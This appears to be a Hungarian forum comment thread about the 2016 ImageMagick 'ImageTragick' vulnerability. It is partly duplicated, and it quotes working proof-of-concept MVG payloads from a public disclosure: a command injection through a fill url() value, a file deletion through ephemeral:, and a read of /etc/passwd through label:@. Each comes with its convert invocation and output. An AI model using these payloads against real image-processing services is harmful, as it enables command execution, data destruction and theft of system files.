De ez az imagemagick-os messze a legkritikusabbnak tűnik, mivel a legelterjedtebb képfeldolgozó programról van szó és a leírás alapján elég könnyű kihasználni, akár automatizált botokkal is.
Új TLD-t a sebezhetőségeknek! imagetragick.com? Fenét! imagetragick.vuln
(egyébként miért kap mindegyik saját domaint? Nem volna ésszerű egy közös domain alá gyűjteni őket?)
Egy értelmes kérdés is: a php-gd-nek ehhez semmi köze, ugye?
Ez minden hasonló esetnél előjön, de én hasznosnak tartom a sok szolgáltatást/felhasználót érintő bugok brandelését:
- egyszerűbb így hivatkozni rájuk, mint pl a CVE-2016-3714 kóddal
- egy helyre összegyűjtik az ezzel kapcsolatos összes információt
- így talán nagyobb médiafigyelmet kap
- miért ne? negatívumként nem nagyon tudok felhozni semmit
php-gd-t ez nem érinti
közben megjött az exploit is:
exploit.mvg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
$ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..
...
(az imagemagick kiterjesztéstől függetlenül automatikusan felismeri a képformátumokat, így jpg-re korlátozott feltöltés esetén is exploitolható)
Az a jó, hogy természetesen a szintén IM-hez tartozó identify is érintett, szóval az adatfeldolgozásnál valami másik eszközzel kell szűrni, hogy jó legyen.
Hozzászólások
Ugyancsak ma/tegnap publikált, elég komoly hibák:
https://www.openssl.org/news/secadv/20160503.txt
https://source.android.com/security/bulletin/2016-05-01.html
De ez az imagemagick-os messze a legkritikusabbnak tűnik, mivel a legelterjedtebb képfeldolgozó programról van szó és a leírás alapján elég könnyű kihasználni, akár automatizált botokkal is.
Új TLD-t a sebezhetőségeknek! imagetragick.com? Fenét! imagetragick.vuln
(egyébként miért kap mindegyik saját domaint? Nem volna ésszerű egy közös domain alá gyűjteni őket?)
Egy értelmes kérdés is: a php-gd-nek ehhez semmi köze, ugye?
Látszólag nem függőség.
Ez minden hasonló esetnél előjön, de én hasznosnak tartom a sok szolgáltatást/felhasználót érintő bugok brandelését:
- egyszerűbb így hivatkozni rájuk, mint pl a CVE-2016-3714 kóddal
- egy helyre összegyűjtik az ezzel kapcsolatos összes információt
- így talán nagyobb médiafigyelmet kap
- miért ne? negatívumként nem nagyon tudok felhozni semmit
php-gd-t ez nem érinti
közben megjött az exploit is:
exploit.mvg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
$ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..
...
(az imagemagick kiterjesztéstől függetlenül automatikusan felismeri a képformátumokat, így jpg-re korlátozott feltöltés esetén is exploitolható)
via http://www.openwall.com/lists/oss-security/2016/05/03/18
Az a jó, hogy természetesen a szintén IM-hez tartozó identify is érintett, szóval az adatfeldolgozásnál valami másik eszközzel kell szűrni, hogy jó legyen.
Hotfix addig míg a fejlesztők tüsténkednek:
/etc/ImageMagick/policy.xml kiegészítése ezzel:
További vicces dolgok:
file_delete.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
popgraphic-context
$ touch /tmp/delete.txt
$ convert delete_file.mvg out.png # deletes /tmp/delete.txt
file_read.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@...c/passwd'
pop graphic-context
$ convert file_read.mvg out.png # produces file with text rendered from /etc/passwd
Azert ezekre eleg nehez elfogadni a "nem gondoltak ra" kifogast